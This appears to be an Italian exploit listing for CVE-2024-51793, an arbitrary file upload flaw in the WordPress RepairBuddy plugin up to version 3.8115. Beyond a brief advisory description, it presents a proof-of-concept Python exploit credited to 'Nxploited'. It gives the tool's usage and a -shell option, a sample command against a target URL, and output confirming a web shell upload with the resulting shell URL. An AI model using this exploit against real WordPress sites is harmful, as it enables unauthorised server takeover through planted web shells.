
Plugin WordPress RepairBuddy <= 3.8115 - Vulnerabilità di caricamento arbitrario di file
CVE-ID: CVE-2024-51793
Pubblicato: 2024-11-11
Aggiornato: 2024-11-11
Titolo: WordPress RepairBuddy plugin <= 3.8115 - Vulnerabilità di upload arbitrario di file
Descrizione:
Vulnerabilità di upload di file non limitato con tipo pericoloso in Webful Creations Computer Repair Shop che consente di caricare una Web Shell su un server Web. Questo problema interessa Computer Repair Shop: da n/a fino a 3.8115.
CWE:
CVSS:
Questo è un exploit proof of concept per la vulnerabilità di upload arbitrario di file nel plugin WordPress RepairBuddy versioni <= 3.8115. L'exploit consente a un attaccante di caricare una web shell sul server vulnerabile.
requests (pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
Exploit di Nxploited, Khaled Alenazi